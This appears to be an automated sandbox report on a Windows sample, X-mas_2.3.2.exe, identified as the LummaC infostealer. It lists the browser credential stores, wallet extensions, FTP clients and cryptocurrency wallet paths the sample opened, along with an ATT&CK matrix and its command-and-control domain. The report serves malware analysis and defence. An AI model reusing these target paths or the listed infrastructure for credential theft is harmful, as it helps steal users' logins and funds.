Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\EEGWXUHVUG	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\WSHEJMDVQC	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\BXAJUJAOEO	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\GLTYDMDUST	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2317946909.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: X-mas_2.3.2.exe PID: 3140, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: X-mas_2.3.2.exe PID: 3140, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	221 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	32 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
X-mas_2.3.2.exe	45%	ReversingLabs	Win32.Trojan.CrypterX
X-mas_2.3.2.exe	100%	Avira	HEUR/AGEN.1306956
X-mas_2.3.2.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://begguinnerz.biz/6	100%	Avira URL Cloud	malware
https://begguinnerz.biz/1	100%	Avira URL Cloud	malware
https://begguinnerz.biz/q	100%	Avira URL Cloud	malware
https://begguinnerz.biz/apiFK	100%	Avira URL Cloud	malware
https://begguinnerz.biz/d	100%	Avira URL Cloud	malware
https://begguinnerz.biz/api1	100%	Avira URL Cloud	malware
begguinnerz.biz	100%	Avira URL Cloud	malware
https://begguinnerz.biz/apiND	100%	Avira URL Cloud	malware
https://begguinnerz.biz/	100%	Avira URL Cloud	malware
https://begguinnerz.biz/api8	100%	Avira URL Cloud	malware
https://begguinnerz.biz:443/api	100%	Avira URL Cloud	malware
https://begguinnerz.biz/api	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
begguinnerz.biz	172.67.190.223	true	true		unknown
198.187.3.20.in-addr.arpa	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	false		high
wholersorie.shop	false		high
begguinnerz.biz	true	Avira URL Cloud: malware	unknown
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
nearycrepso.shop	false		high
framekgirus.shop	false		high
https://begguinnerz.biz/api	true	Avira URL Cloud: malware	unknown
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/6	X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005A6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.5.dr	false		high
https://begguinnerz.biz/1	X-mas_2.3.2.exe, 00000000.00000003.2278756433.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/q	X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/	X-mas_2.3.2.exe, 00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/d	X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000636000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/api8	X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/api1	X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://begguinnerz.biz/apiND	X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000636000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.microh	X-mas_2.3.2.exe, 00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2278756433.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2278590406.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2317946909.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	X-mas_2.3.2.exe, 00000000.00000003.2279589029.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279654026.0000000002E57000.00000004.00000800.00020000.00000000.sdmp, X-mas_2.3.2.exe, 00000000.00000003.2279519887.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	X-mas_2.3.2.exe, 00000000.00000003.2302211201.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	X-mas_2.3.2.exe, 00000000.00000003.2303417197.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://begguinnerz.biz/apiFK	X-mas_2.3.2.exe, 00000000.00000002.2578282722.0000000000636000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
